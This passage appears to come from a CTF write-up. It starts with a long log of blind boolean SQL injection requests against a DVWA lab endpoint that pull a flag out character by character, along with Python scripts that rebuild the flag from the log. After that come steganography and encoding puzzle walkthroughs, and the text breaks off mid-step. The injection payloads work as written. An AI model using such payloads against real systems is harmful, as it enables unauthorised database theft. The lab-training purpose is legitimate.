GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>36 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>42 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>45 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>46 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>92 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>56 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>62 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>63 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>56 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>52 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),27,1))>53 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>67 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>57 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>52 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),28,1))>55 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>117 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>122 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>125 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>123 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),29,1))>124 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),30,1))>1 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>64 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>32 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>48 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>56 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>52 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>50 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>49 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>47 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(id AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>1 AND 'ouwc'='ouwc&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)

Write a Python exp script:

import re

# Initialise
flag = ""
index = 1
ascs = [0, 0]
code = 0  # status code of the previous response

with open("my.txt", "r") as f:
    lines = f.readlines()
for i in range(0, len(lines), 2):
    try:
        # Extract the key payload fragment
        # lines[i] is line i (counting from zero) of the text read from the file
        payload = re.search(r"\d+,1\)\)>\d+", lines[i]).group()

        # Extract the index value (the character position being tested)
        _index = int(re.search(r"\d+", payload).group())
        if _index > index:
            index = _index
            if ascs[0] < ascs[1]:
                if code == 200:
                    flag += chr(ascs[1] + 1)
                else:
                    flag += chr(ascs[1])
            else:
                if code == 200:
                    flag += chr(ascs[0])
                else:
                    flag += chr(ascs[1])
            print(flag)
        # Take the slice from the second character to the end: the matched string starts with the greater-than sign >, and only the digits are needed.
        asc = int(re.search(r">\d+", payload).group()[1:])
        # Append the newly extracted ASCII value to the end of ascs and remove the first element, so that ascs always holds exactly two elements: the two most recently extracted ASCII values.
        ascs.pop(0)
        ascs.append(asc)
        code = int(re.search(r"\d\d\d", lines[i + 1]).group())

    # Do nothing when a line does not match the expected request/response format
    except (AttributeError, IndexError):
        pass

Flag: flag{hAcker_sq1map_test0_@67}
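The same recovery done with explicit bounds instead of the last two probes, as an added example that is not part of the original write-up: every 200 raises the lower bound for a character and every 404 lowers the upper bound, so a position is accepted only once the two meet. The sample probes are positions 27-30 of `flag` and 1-2 of `id` taken from the capture above; `parse_probes`, `reconstruct` and `sample_lines` are names chosen here.

```python
import re
from collections import defaultdict

# One probe asks: is ORD(character <pos> of <column>, row <row>) > <threshold>?
PROBE = re.compile(
    r"CAST\((\w+) AS NCHAR\).*?LIMIT (\d+),1\),(\d+),1\)\)>(\d+)")
STATUS = re.compile(r"^HTTP/1\.[01] (\d{3})")
MAX_CODEPOINT = 0x10FFFF


def parse_probes(lines):
    """Yield (column, row, pos, threshold, answered_true) per request/response pair."""
    pending = None
    for line in lines:
        probe = PROBE.search(line)
        if probe:
            col, row, pos, thr = probe.groups()
            pending = (col, int(row), int(pos), int(thr))
            continue
        status = STATUS.match(line.strip())
        if status and pending:
            # In this capture the application answers 200 for true, 404 for false.
            yield (*pending, status.group(1) == "200")
            pending = None


def reconstruct(lines):
    """Return {(column, row): {pos: char}} recovered from the probe answers."""
    # bounds[(column, row)][pos] = [lo, hi], meaning lo < ORD(char) <= hi
    bounds = defaultdict(lambda: defaultdict(lambda: [-1, MAX_CODEPOINT + 1]))
    for col, row, pos, thr, answered_true in parse_probes(lines):
        lo_hi = bounds[(col, row)][pos]
        if answered_true:
            lo_hi[0] = max(lo_hi[0], thr)
        else:
            lo_hi[1] = min(lo_hi[1], thr)

    result = {}
    for key, positions in bounds.items():
        chars = {}
        for pos, (lo, hi) in sorted(positions.items()):
            if lo < 0 and hi <= 1:
                continue  # even ">1" was false: this position is past the end
            # "?" marks a position whose probes are missing or contradictory
            converged = hi == lo + 1 and hi <= MAX_CODEPOINT
            chars[pos] = chr(hi) if converged else "?"
        result[key] = chars
    return result


# (column, position, threshold, status) for probes copied from the capture above
SAMPLE = [
    ("flag", 27, 64, 404), ("flag", 27, 32, 200), ("flag", 27, 48, 200),
    ("flag", 27, 56, 404), ("flag", 27, 52, 200), ("flag", 27, 54, 404),
    ("flag", 27, 53, 200),
    ("flag", 28, 47, 200), ("flag", 28, 87, 404), ("flag", 28, 67, 404),
    ("flag", 28, 57, 404), ("flag", 28, 52, 200), ("flag", 28, 54, 200),
    ("flag", 28, 55, 404),
    ("flag", 29, 47, 200), ("flag", 29, 87, 200), ("flag", 29, 107, 200),
    ("flag", 29, 117, 200), ("flag", 29, 122, 200), ("flag", 29, 125, 404),
    ("flag", 29, 123, 200), ("flag", 29, 124, 200),
    ("flag", 30, 64, 404), ("flag", 30, 32, 404), ("flag", 30, 1, 404),
    ("id", 1, 64, 404), ("id", 1, 32, 200), ("id", 1, 48, 200),
    ("id", 1, 56, 404), ("id", 1, 52, 404), ("id", 1, 50, 404),
    ("id", 1, 49, 404),
    ("id", 2, 47, 404), ("id", 2, 1, 404),
]
# Line format of the capture; the trailing tag is kept constant in this sample.
REQUEST = ("GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT "
           "IFNULL(CAST({col} AS NCHAR),0x20) FROM swctf.snert ORDER BY id "
           "LIMIT 0,1),{pos},1))>{thr} AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1")
STATUS_LINE = {200: "HTTP/1.1 200 OK  (text/html)",
               404: "HTTP/1.1 404 Not Found  (text/html)"}


def sample_lines():
    """Render SAMPLE back into the request/response lines the parser expects."""
    out = []
    for col, pos, thr, status in SAMPLE:
        out.append(REQUEST.format(col=col, pos=pos, thr=thr))
        out.append(STATUS_LINE[status])
    return out


if __name__ == "__main__":
    for (col, row), chars in reconstruct(sample_lines()).items():
        print(col, row, chars)
```

Passing the lines of my.txt to `reconstruct` instead of `sample_lines()` processes the whole capture and keeps the `flag` and `id` columns apart.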

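5、Bieber&Troye

The attachment is an encrypted archive, and the hint says the password has already been given in the video.

The link points to a video.

On a computer the player skips the last few frames of the video by default, so open it on a phone instead; at the very end you can see the following information:

Using the known part of the password and this information, run a mask attack directly.

This gives the password: @@@qwq7890

Extract the archive with the password to get two images.

Analyse them with Stegsolve.

Troye's image hides data in the least significant bit of the blue channel (the cover is Troye's album "Blue Neighbourhood").

Scanning the QR code gives:

Bisa_bahasa_Indo_gak

This is certainly not the flag, because the other image has not been processed yet; most likely it is just a password.

Taken together with the file, we are being asked to guess the flag.

We happen to have a password, and the image is a jpg, so analyse it with outguess:

outguess -r bieber.jpg -k Bisa_bahasa_Indo_gak out.txt

The data is extracted successfully, so steganography is indeed present.

Flag: flag{Forget_me_n0t_tea_aLLah}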

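6、Unmask The Joker

The challenge attachments are a txt document, a jpg image and a zip archive.

hello.txt appears to be just an ordinary document with a greeting and a hint.

Trying zero-width steganography extraction turns up nothing.

According to the document, we have to open the encrypted archive (joker.zip) before the real challenge begins.

The last sentence is a hint: By the way, can you see anything on my face?

There should be something on the clown's face.

After repeated attempts, this turns out to be a blind watermark.

Password obtained: SNERT*2024*SWCTF

Open joker.zip with the password.

This yields three new attachments: a png image, a txt document and, hardest to deal with, a file named joker whose type is unknown.

Start with the files of known type, such as hint.txt.

Select all with Ctrl+A and you can see that some invisible content is present.

Combine that with the text hint: 有雪在下是难见的远方 (roughly, "with snow falling, the distance is hard to see")

Snow? Then it is snow steganography.

What is the password? There is no other hint here, so the only option is to try the given text itself.

snow.exe -p 有雪在下是难见的远方 -C hint.txt

This gives another key, AESkey:joker

Now look at direct.png.

Analysis finds nothing hidden in it.

So it may be just an ordinary image that points the way.

What information is in the image? A pair of eyes and a line of text whose final word, "silent", is marked in red.

The tool I wanted to hint at here is SilentEye, literally "the silent eye".

Anyone who does Misc would end up using this tool even without the hint.

Next, the joker file.

Again, open it in 010editor.

The file header reveals nothing.

Look at the end of the file: 8D FF

Reversed, that is exactly the jpg file header FF D8.

Extract the hex values (there is no clear boundary here, so to be safe extract all of them).

Note: in 010editor, Ctrl+C and Ctrl+V operate on the ASCII pane on the right. To operate on the hexadecimal values on the left you need to add Shift, that is, copy with Ctrl+Shift+C, and likewise paste into the hex pane with Ctrl+Shift+V.

Reverse the hex values; here a Python script does it (many other methods work too).

Just have ChatGPT write one.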

def reverse_and_format_hex(hex_string):
    # Remove any spaces or other separators
    hex_string = hex_string.replace(" ", "").replace("\n", "")

    # Reverse the whole hexadecimal string, character by character
    reversed_hex_string = hex_string[::-1]

    # Group into pairs separated by spaces
    formatted_hex_string = ' '.join([reversed_hex_string[i:i+2] for i in range(0, len(reversed_hex_string), 2)])

    return formatted_hex_string

# Paste your hexadecimal data string here
hex_data = ''''''

# Get the reversed and formatted hexadecimal string
reversed_and_formatted_hex_data = reverse_and_format_hex(hex_data)
print(reversed_and_formatted_hex_data)

After reversing, we get hex values that begin with FF D8.

Create a new hex file and import the reversed hex values; remember to use Ctrl+Shift+V.

Since it has a jpg header, save it as a jpg file.

Opening it shows the Joker's portrait.

Reopen this jpg in 010editor and you will see the jpg highlighting.

Why emphasise the highlighting? Because this feature often makes it easy to tell the file type and to locate hex values.

You can see that something is hidden at the end.

A normal jpg ends with FF D9.

Now you see why common file headers and trailers matter.

Extract and save it in the same way.

The file type cannot be determined here, so we add no extension.

Open it with Notepad (a text editor).

It is a bunch of odd emoji.

So what is this? Recall that we obtained an AES key earlier.

Searching for related material tells you this is emoji AES encryption.

Decode it with the online site: https://ruotian.io/2020/02/emoji-aes/

This gives a string: floccinaucinihilipipification

It looks like yet another password.

With an image and a password, and the hint in direct.png (the silent eye), decrypt with SilentEye.

Flag found:

flag{My_1ife_is_nothing_but_c0medy}

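7、Master Yong's Whimsical Ideas (Hardened Edition 1)

The attachments are as follows

Myon.zip contains three encrypted archives

Start with key.jpg

A phone cannot recognise it, though, so scan it with QR_Research

This gives password:123456@Swctf

Extract Myon.zip with the password

This gives three files; two of them are password-protected archives, so look at the Word document first

A warning appears when opening it, which means this is not just a plain Word document; something else may be hidden in it that causes the error on opening

Click Yes to open it

According to the description, this should be the key for opening bx.zip

But the writing is unreadable, so use image recognition to see whether anything similar can be found

Plenty turns up

Take care with how you save the image from the Word document: avoid copy and paste where possible, because it greatly degrades the image quality and prevents the image content from being recognised correctly. I also put a reminder about this in the Word document.

After gathering information you learn that this is the script from a game, called Sheikah (希卡文, which also matches the Word file name hika)

The kind author even provides a decoding site: https://kinglisky.github.io/zelda-words/index.html

Decoding gives manchester

This password opens bx.zip

After extraction, two of the archives are password-protected, while the capture file has no password and can be opened directly

Look at hi.txt

It hints that the key for run.zip can be found in the capture

This one is a bit hard

Remember what I said earlier about the Word document having a problem when opened?

Open the Word document in 010editor

You can see it has a PK header, which is the mark of a zip archive

(In fact Word and zip files share the same header; a Word file is essentially made up of some directories)

Change the Word document's extension to zip and open it

Four of the entries are standard, but there is one extra file of unknown format, my

Extract that file and open it

Since the file format is unknown, first open it in Notepad

Two things stand out: an svg tag and the alert popup function

svg is the extension of an image format (Scalable Vector Graphics)

Add the extension and double-click to open it

Clicking "click me" brings up a popup

This gives mykey:*0*XSS@666

which is the password for my.zip

Extract my.zip with the password

to get an image, hint.png

It shows a clock signal clk, a data signal dat, and one unknown signal

With the clock and input signals present, the last one is most likely the output signal

We do not yet know what rule or encryption scheme this is

The clock is a regular periodic square wave

For the input and output signals, assume high level is 1 and low level is 0, going from dat to ?

From the picture: a high level is split into high then low, and a low level is split into low then high

So the rule the picture describes is: 1 is encoded as 10, and 0 is encoded as 01

Looking it up shows that this is a variant of Manchester encoding

Remember the Sheikah text decoded earlier? manchester

That further confirms our guess

This really was a bit hard on everyone; just take it as one of Master Yong's whimsical ideas.

Next we have to face the capture file

This is actually an attachment from an earlier competition

For the detailed tracing steps on this capture, see my earlier blog post:

https://myon6.blog.csdn.net/article/details/134086143

By tracing the user name and the internal IP

we finally get the key: www-data_172.17.0.2

Extract run.zip with that password to get an executable, run.exe

Judging by the icon, it was written in Python

I am not sure whether students who study reverse engineering would have an advantage here

I asked a friend who does reversing to take a quick look; he said nothing leaks, so I made no changes

Double-clicking it prompts us to enter something

Entering something at random gives nothing useful

That leaves one last attachment, in.zip

It needs a password, so first open it in 010 editor

An error appears, so this zip must hide something or have been altered

Scroll to the end to find a hidden string

==AMtVmTF5GMtVmO5V2a

Upper- and lower-case letters and digits; it looks like base64

But the two equals signs are at the start, and we know base64 padding can only appear at the end

Guess that the order has been reversed, so reverse the string

to get a2V5OmVtMG5FTmVtMA==

base64 decoding gives

key:em0nENem0

Extract in.zip with the key

to get secret.png

I originally wanted to make a "mirage tank" (幻影坦克) image, but I am not good at tuning the parameters

It is easy to see the ghost of a clown face in the centre

Look more closely (zoom in on the image)

There is something here

If it is still hard to see, adjust the brightness and contrast a little

Now it is clear

The content is: @laughing!

Recall that the archive is named in.zip

So this should be what we need to enter into the exe

Enter it and press Enter

Sure enough, a string of data pops out: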

0110100101101001EE0110100110100101EE0110100101010110EE0110100101101010EE0110101010011010EE0101101001010110EE0110011010101010EE0110010110011001EE0110101001100110EE0110101001011010EE0110101001100101EE0110011010101010EE0110100110010101EE0101101001010101EE0110101001010101EE0110100101100110EE0110011010101010EE0110100110100110EE0110011010010110EE0110011010101010EE0110100101100101EE0110100101100110EE0110100101010110EE0110011001100101EE0110100110010101EE0110011010101010EE0110100110100110EE0110010101010110EE0110100110011010EE0110100101100110EE0110101001011010EE0110011010101010EE0110100110100110EE0110100110101010EE0110011001011001EE0110100101100110EE0110011010101010EE0110100101011010EE0110010101100110EE0110100110101001EE0110101001100101EE0110101001011010EE0110011010101010EE0110101001100101EE0110100110010101EE0110100101010110EE0110100110101001EE0110100110100110EE0110101010010110EE0110100110100101EE0110100110010110EE0110100101101001EE0110100101100110EE0110101010100110

These are 0/1 symbols, which match the Manchester encoding from hint.png

But the data contains EE, which has to be removed

Notepad can do this: replace EE with nothing

Result:

011010010110100101101001101001010110100101010110011010010110101001101010100110100101101001010110011001101010101001100101100110010110101001100110011010100101101001101010011001010110011010101010011010011001010101011010010101010110101001010101011010010110011001100110101010100110100110100110011001101001011001100110101010100110100101100101011010010110011001101001010101100110011001100101011010011001010101100110101010100110100110100110011001010101011001101001100110100110100101100110011010100101101001100110101010100110100110100110011010011010101001100110010110010110100101100110011001101010101001101001010110100110010101100110011010011010100101101010011001010110101001011010011001101010101001101010011001010110100110010101011010010101011001101001101010010110100110100110011010101001011001101001101001010110100110010110011010010110100101101001011001100110101010100110

Find an online decoder

Pay attention to the mode selected

Decoding gives

011001100110110001100001011001110111101100110001010111110100101001110101011100110111010001011111011010000011000001110000011001010101111101101101010110010101111101100100011001010110000101010100011010000101111101101101010000010110101101100101011100110101111101101101011011110101001001100101010111110110001101000101011011100111010001110011010111110111010001101000011000010110111001101101011110010110110001101001011001100110010101111101

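All the attachments have now been used, so what is an encoding made up purely of the digits 0 and 1?

There are no separators here, so Morse is ruled out

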